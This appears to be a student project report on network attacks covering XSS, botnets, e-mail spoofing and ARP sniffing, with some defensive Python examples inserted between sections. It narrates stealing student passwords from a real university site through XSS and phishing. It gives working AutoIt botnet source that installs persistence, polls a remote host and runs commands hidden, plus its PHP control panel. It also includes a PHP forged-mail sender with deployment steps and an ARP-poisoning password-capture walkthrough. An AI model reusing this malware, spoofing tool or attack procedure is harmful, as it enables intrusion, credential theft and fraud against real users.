Step 3: Determine whether the site is likely to have an XSS flaw by looking at what comes back. For example, if we see something like 'XSS not found', 'Account XSS is incorrect' or 'Login with XSS failed', then that place is very likely to be affected by XSS.
Step 4: Once a place that may have an XSS flaw has been identified, we insert our own code to test further, for example:
Insert this code: <script>alert('XSS')</script> into the flawed field and press the Login button. If a popup with the text 'XSS' appears, the site is 100% affected by XSS. Note, however, that sometimes the website is affected by XSS but no popup appears; in that case you have to VIEW SOURCE (cut it open) to look. When viewing the source, look for the line <script>alert('XSS')</script>; if it is there, there is no escape, the XSS is right there.
Let http://doannguyennganh.com/index.php be the site with the XSS flaw, and suppose we find the flawed location to be: http://doannguyennganh.com/index.php?page=<script...</script> , meaning that code can be inserted directly in the ADDRESS bar.
Step 5: Plan the attack scenario.
ii: The attack
There are in fact many attack techniques based on this XSS flaw; once people know how to find the hole, each will have their own trick for attacking. Here I would like to present a technique that I carried out successfully on the moodle page of the KHTN faculty of information technology: a password theft technique.
After confirming for certain that the moodle page had an XSS flaw in its login section, I immediately wrote a small application and uploaded it to a free host. The job of this application is to receive the student ID and password sent to it and write them to a txt file. As for how it receives them, read on...
After that:
Step 1: I created a forged e-mail saying: Intel recruitment forum, anyone interested is invited to join. Then I created a fake link:
http://doannguyennganhgia.com/index.php
which in reality referenced a fake page of mine. In an instant this page attaches a malicious script, whose job is to obtain the username and password after login, to the real page (because the real page has an XSS flaw, it lets us attach malicious code; "attach" here means that when we view the source code of the page, we will see our script somewhere in it), and then redirects to the real page immediately to avoid suspicion.
Step 2: The user opens the e-mail, believes it, clicks the link and sees the correct moodle page (they do not suspect that the real page has had malicious code attached; it happens so fast that they notice nothing, although anyone paying attention would see that the link is wrong).
Step 3: They log in. The page is then processed from top to bottom, and of course the script we planted runs as well; the student ID and password are taken and sent to a page on the server that we set up.
Step 4: Our server application receives the student ID and password and writes them to the txt file.
Step 5: The attack ends, and we have a list of student accounts.
2.4.2. Prevention
As mentioned above, an XSS attack only works when a web page is sent to the victim's browser together with the attacker's malicious script. Web developers can therefore protect their sites from being abused through XSS by ensuring that dynamically generated pages contain no script tags, either by filtering and validating the input received from users or by encoding and filtering the values output to users.
+ Filtering
Always filter data entered by users by filtering the meta characters (special characters) defined in the HTML specification. Every input field, including link parameters, is checked to detect script tags.
+ Encoding
XSS can be avoided when the web server ensures that generated pages are properly encoded to prevent unwanted scripts from running.
Server-side encoding is a process in which all dynamically generated content passes through an encoding function, where script tags are replaced by their encoded form.
In general, encoding is recommended because it does not require you to decide which characters are valid or invalid. However, encoding all untrusted data can consume resources and affect the performance of some servers.
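The filtering, validation and encoding steps described above, as an added example that is not part of the original report. Python stands in for the site's PHP; the function names, the allowed page names and the host site.example are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# Assumption: the site serves a fixed set of pages through ?page=<name>.
ALLOWED_PAGES = {"home", "login", "news"}
# HTML metacharacters that the filtering step looks for in raw input.
HTML_META = re.compile(r"[<>\"'&]")


def has_meta(value: str) -> bool:
    """Filtering: report whether the input carries HTML metacharacters."""
    return bool(HTML_META.search(value))


def validate_page(value: str) -> str:
    """Validation: accept only known page names, otherwise fall back to 'home'."""
    return value if value in ALLOWED_PAGES else "home"


def encode_html(value: str) -> str:
    """Encoding: replace & < > " ' with entities so tags are shown, not run."""
    return html.escape(value, quote=True)


def render(url: str) -> str:
    """Build the response body for a request URL, echoing input safely."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    raw = query.get("page", ["home"])[0]
    page = validate_page(raw)
    note = ""
    if page != raw:
        # The rejected value is echoed back, so it goes through the encoder.
        note = "<p>Unknown page: " + encode_html(raw) + "</p>"
    # Link parameter: URL-encode the value, then HTML-encode the attribute.
    href = encode_html("index.php?page=" + quote(page, safe=""))
    return note + '<a href="' + href + '">reload</a>'


# Constructed request carrying the probe string used in the text.
PROBE_URL = "http://site.example/index.php?page=<script>alert('XSS')</script>"

if __name__ == "__main__":
    print(render(PROBE_URL))
    print(render("http://site.example/index.php?page=news"))
```

With encoding in place, the probe from Step 4 appears in VIEW SOURCE only as entity text, so the browser displays it instead of executing it.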


2.5. Botnet
2.5.1. Botnets and how they spread
A botnet is a network of hundreds or thousands of hijacked computers (zombies) that hackers use to carry out DDoS attacks, send spam or install adware.
Tools are used to spread a virus to victims and take control of their machines. Botnets are heavily used for denial-of-service attacks.
Common botnets include Mariposa and Zeus.

2.5.2. Remediation
Do not click any link sent to you whose origin you do not know.
2.5.5. Supporting tools
Most of these tools are written by hackers to spread a virus and take control. Below is an example of botnet code written in AutoIt.
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=duc.ico
#AutoIt3Wrapper_Res_Comment= Do An Chuyen Nganh
#AutoIt3Wrapper_Res_Description= Do An Chuyen Nganh
#AutoIt3Wrapper_Res_Fileversion=2.1.0.1
#AutoIt3Wrapper_Res_LegalCopyright=CopyRight(C) ProKill Production
#AutoIt3Wrapper_Res_Language=1033
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Process.au3>
$txt = "http://doanchuyenganh.net/direc.txt"
FileCopy(@ScriptFullPath, @SystemDir & "\svchosts.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run", "svchosts", "REG_SZ", @SystemDir & "\svchosts.exe")
$A1610F06101 = IniRead(@SystemDir & "\knt.ini", "1", "1", "")
IniWrite(@SystemDir & "\knt.ini", "1", "1", $A1610F06101 + 1)
If $A1610F06101 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run", "knt")
EndIf
While (1)
GetDr()
ExCmd()
Sleep(1000)
WEnd
Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc
Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN@", 2) Then ;Chay mot chuong trinh
$cmd = StringSplit($con, "@")
If StringInStr($con, "@SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "DEL@", 2) Then ;xoa mot file
$cmd = StringSplit($con, "@")
FileDelete($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "LOAD@", 2) Then ;tai mot file
$cmd = StringSplit($con, "@")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)
ElseIf StringInStr($con, "KILL@", 2) Then ;tat mot tien trinh
$cmd = StringSplit($con, "@")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
ElseIf StringInStr($con, "DOS@", 2) Then ;Chay len dos, an voi nguoi dung
DOS#LENH
$cmd = StringSplit($con, "@")
$rc = _RunDos($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "MSGBOX@", 2) Then ;hien thong bao
MSGBOX#flag#title#text#timeout
$cmd = StringSplit($con, "@")
MsgBox($cmd[2],$cmd[3],$cmd[4],$cmd[5])
Sleep(7000)
ElseIf StringInStr($con, "EXIT@", 2) Then ;thoat chuong trinh
$cmd = StringSplit($con, "@")
Exit
EndIf
EndFunc
//Control panel
<html>
<head>
<title>Bang dieu khien cua BotNet</title>
</head>
<body style='color:#00FF00; background-color: black'>
<center>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Ok>
</form>
<br>
</body>
</html>
<?php
$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>
</center>
<br/>
<br/>
<br/>RUN@path_file<br/>
DEL@path_file<br/>
KILL@ten_Processe<br/>
LOAD@URL@PATH<br/>
DOS@LENH<br/>
MSGBOX@flag@title@text@timeout<br/>
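The sample above fetches the same text file in an endless loop, and that regularity is what a defender can look for in web proxy logs. The following detector is an added example, not code from the original report; the log format, the addresses and the host c2.example are constructed, and the thresholds are assumptions to tune per network.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed proxy log lines: "<epoch seconds> <client ip> <method> <url>".
# 10.0.0.23 imitates a polling loop that re-fetches one text file;
# 10.0.0.40 is ordinary browsing.
SAMPLE_LOG = """\
1700000000 10.0.0.23 GET http://c2.example/direc.txt
1700000001 10.0.0.40 GET http://intranet.example/index.html
1700000002 10.0.0.23 GET http://c2.example/direc.txt
1700000004 10.0.0.23 GET http://c2.example/direc.txt
1700000005 10.0.0.40 GET http://intranet.example/style.css
1700000006 10.0.0.23 GET http://c2.example/direc.txt
1700000008 10.0.0.23 GET http://c2.example/direc.txt
1700000010 10.0.0.23 GET http://c2.example/direc.txt
1700000012 10.0.0.23 GET http://c2.example/direc.txt
1700000300 10.0.0.40 GET http://intranet.example/index.html
"""


def group_requests(log: str) -> dict:
    """Map (client, url) to the sorted list of request times."""
    seen = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue  # skip malformed lines instead of failing
        stamp, client, _method, url = parts
        seen[(client, url)].append(float(stamp))
    return {key: sorted(times) for key, times in seen.items()}


def find_beacons(log: str, min_hits: int = 6, max_period: float = 60.0,
                 max_jitter: float = 0.2) -> list:
    """Return (client, url, period) for fetches repeated at a steady, short interval."""
    hits = []
    for (client, url), times in group_requests(log).items():
        if len(times) < min_hits:
            continue
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0 or period > max_period:
            continue
        # Coefficient of variation: near 0 means machine-like regularity.
        if pstdev(gaps) / period <= max_jitter:
            hits.append((client, url, round(period, 1)))
    return sorted(hits)


if __name__ == "__main__":
    for client, url, period in find_beacons(SAMPLE_LOG):
        print(client, "polls", url, "every", period, "s")
```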
2.6. Social Engineering

2.6.1. Common types of fraud
Fake mail
Fraudulent e-mails have recently appeared that the recipient cannot recognize as such: the sender address shown is that of someone they know, so they do not suspect anything. The victim will then click any link or comply with whatever the hacker requests.
Below is the code of a common fake mail page.
Page index.php
Code
<title>.:: Fake Mail :: doanchuyennganh.com :: nguyenanhduc.dtu@gmail.com
::.</title>
<form action="sendmail.php" method="post">
<table border="0">
<tbody>
<tr>
<td>To :</td>
<td><textarea name="emaillist" cols="30" rows="10">Email gi n
name@abc.com</textarea></td>
</tr>
<tr>
<td>From :</td>
<td><input name="from" type="text" />Email ngi gi</td>
</tr>
<tr>
<td>From Name :</td>
<td><input name="name" type="text" />Tn ngi gi</td>
</tr>
<tr>
<td>Subject :</td>
<td><input name="subject" type="text" />Tiu </td>
</tr>
<tr>
<td>Message :</td>
<td><textarea cols="30" rows="10" name="message">Ni dung</textarea></td>
</tr>
<tr>
<td></td>
<td><input type="submit" value="Send" /></td>
</tr>
</tbody></table>
</form>
Trang sendmail.php
<html>
<head>
<title>.:: Fake Mail :: doanchuyennganh.com :: nguyenanhduc.dtu@gmail.com
::.</title>
</head>
<body>
<?php
$emaillist=$_POST['emaillist'];
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
$from=$_POST['from'];
$name=$_POST['name'];
$subject=$_POST['subject'];
$message=$_POST['message'];
$message=$message;
$head="From: <$name>".$from."\r\n".
'Reply-To: '.$from."\r\n";
$her=$head.' < '.$from.' >';
$ret=mail($to, $subject, $message, $her);
}
if($ret==true)
echo "<br /> Mail sent Successfully";
else
echo "<br /> Unable to Send mail";
?>
<br><a href="/">Go Back</a>
</body>
</html>
Then upload the two pages above to a host, open index.php and send the fake mail.
Weakness: the hacker must know the victim's e-mail address.
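Mail produced by a form like the one above carries a From header chosen by the sender, but the receiving server still records who really submitted it. The following check on a received message is an added example, not part of the original report; the messages, the domains and the trusted server name mx.corp.example are constructed assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr

TRUSTED_MTA = "mx.corp.example"  # assumption: our own receiving mail server

# Constructed messages. SPOOFED imitates mail submitted through a web form:
# the visible From names a colleague, the envelope sender is the web host.
SPOOFED = """\
Return-Path: <www-data@freehost.example>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=freehost.example; dkim=none; dmarc=fail header.from=corp.example
From: "Director" <director@corp.example>
Reply-To: director@corp.example
To: secretary@corp.example
Subject: Urgent

Please open the link.
"""
GENUINE = """\
Return-Path: <director@corp.example>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=corp.example; dkim=pass header.d=corp.example; dmarc=pass header.from=corp.example
From: "Director" <director@corp.example>
To: secretary@corp.example
Subject: Minutes

Attached.
"""


def domain_of(header_value) -> str:
    """Lower-cased domain of an address header, or '' when absent."""
    address = parseaddr(header_value or "")[1]
    return address.rpartition("@")[2].lower()


def auth_result(msg, method: str) -> str:
    """spf/dkim/dmarc verdict stamped by our own MTA ('' if none)."""
    for value in msg.get_all("Authentication-Results", []):
        server, _, results = value.partition(";")
        if server.strip().lower() != TRUSTED_MTA:
            continue  # headers from other servers can be forged by the sender
        found = re.search(r"\b" + re.escape(method) + r"=(\w+)", results)
        if found:
            return found.group(1).lower()
    return ""


def spoof_findings(raw: str) -> list:
    """Reasons why the From header of a raw message should not be trusted."""
    msg = message_from_string(raw)
    findings = []
    if domain_of(msg["Return-Path"]) != domain_of(msg["From"]):
        findings.append("return-path-mismatch")
    for method in ("dkim", "dmarc"):
        if auth_result(msg, method) != "pass":
            findings.append(method + "-not-pass")
    return findings
```

A Return-Path mismatch alone also occurs with legitimate mailing lists and forwarders, so treat it as a signal to combine with the DMARC verdict rather than as proof.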
2.6.2. Other types of fraud
Other types of fraud include phone-number impersonation, which everyone knows about these days. Impersonating a director phoning a secretary, and so on. This approach requires the hacker to know the victim in detail.
2.7. Sniffer
2.7.1. Sniffer-type attacks
The most popular tool is Cain & Abel, a very powerful eavesdropping tool. We will study sniffing through this tool.

Figure 2.13. Cain at startup

Most hackers use this tool to eavesdrop on a LAN. Sniffing tools capture the packets transmitted on the LAN and deliver them to the hacker. Whether the tools can decode a packet depends on how well it is protected. The hacker then reads these packets to achieve their goal.
2.7.2. Supporting tools
- Cain & Abel v4.9.8 .
- Ethereal v0.10.14 .
- EtherPeek v .
- EffeTechHTTP Sniffer v .
- Wireshark.


CHAPTER 3
DEMO
Here I demonstrate a Sniffer attack on a LAN using the sniffer software Cain & Abel v4.9.8. I will not cover the installation of Cain & Abel v4.9.8.

Figure 3.1. Cain right after startup

Select the Sniffer tab.

Figure 3.2. Sniffer tab

Select Configure.

Figure 3.3 Config tab

Choose the network card that connects to the network to be sniffed; here I choose the network card 192.168.1.53.

Figure 3.4. Configuration for choosing the network card

When the settings are done, select OK.

Select Start Sniffer.

Figure 3.5. Sniffer tab

Select Start ARP.

Figure 3.6. ARP tab

Select Add to List (+).

Figure 3.6. The Add to List item

Select OK (this is the network range we want to sniff; here I leave the default).

Figure 3.7. Choosing the IP range to scan

This is the scan of the whole network we want to sniff.

Figure 3.8. Cain scanning the network ranges

This is the list of machines on the network we want to sniff.

Figure 3.9. Machines on the network after the scan

Select the ARP tab.

Figure 3.10. The ARP item

In the top-right table, click inside the table so that Add to List (+) appears.
Select Add to List (+).

Figure 3.11. The Add to List item in ARP

Figure 3.12. Network addresses to sniff

Select the router address to sniff, 192.168.1.1.

Figure 3.13. Network address selected for sniffing

Select all the machines we want to sniff.

Figure 3.14. Selected network addresses (highlighted in blue)

Select OK.
Select Start ARP.

Figure 3.15. The start ARP button

Check Cain & Abel's sniffing progress.

Figure 3.16. Sniffing in progress

Select the Passwords tab.

Figure 3.17. Selecting the Password tab

Select HTTP to see the list of what was sniffed, on the right-hand side.

Figure 3.18. The usernames and passwords that Cain sniffed
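The ARP step of the demo makes hosts on the LAN map the router's IP address to the sniffing machine's MAC address, which is visible in a victim's own ARP cache. The following check is an added example, not part of the original report: it parses constructed Windows `arp -a` output in which the MAC addresses are invented and only 192.168.1.1 and 192.168.1.53 come from the demo.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `arp -a` output from a host on the demo's 192.168.1.0/24 LAN.
# The router and 192.168.1.53 resolve to the same MAC: a poisoned cache.
ARP_TABLE = """\
Interface: 192.168.1.20 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-0c-29-aa-bb-cc     dynamic
  192.168.1.53          00-0c-29-aa-bb-cc     dynamic
  192.168.1.60          00-0c-29-11-22-33     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\b"
)


def parse_arp(table: str) -> dict:
    """Return {ip: mac} for unicast entries, MACs normalised to aa:bb:cc:..."""
    entries = {}
    for line in table.splitlines():
        match = ROW.match(line)
        if not match:
            continue  # interface banner, column header, blank line
        ip, mac = match.group(1), match.group(2).lower().replace("-", ":")
        if int(mac[:2], 16) & 1:
            continue  # broadcast/multicast MACs are shared by design
        entries[ip] = mac
    return entries


def shared_macs(entries: dict) -> dict:
    """Return {mac: [ips]} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips, key=ipaddress.ip_address)
            for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(table: str, gateway: str, known_mac: str = "") -> list:
    """Findings for the gateway entry: changed MAC and hosts sharing its MAC."""
    entries = parse_arp(table)
    mac = entries.get(gateway)
    if mac is None:
        return ["gateway-missing"]
    findings = []
    if known_mac and mac != known_mac.lower().replace("-", ":"):
        findings.append("gateway-mac-changed")
    for ip in shared_macs(entries).get(mac, []):
        if ip != gateway:
            findings.append("same-mac-as-gateway:" + ip)
    return findings


if __name__ == "__main__":
    print(check_gateway(ARP_TABLE, "192.168.1.1"))
```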

CONCLUSION
1. Results achieved
Through this specialized project, the first thing I achieved is a basic understanding of the principles and methods of the attacks we see on the network every day, as well as a basic understanding of the methods for limiting these types of attack.
Carrying out this project also taught me how important information security is on a network and helped me consolidate the network security knowledge I had learned before.

2. Limitations
While working on the project I found many documents that share the same purpose but use completely different methods. I tried to study them further, but many mistakes are unavoidable.


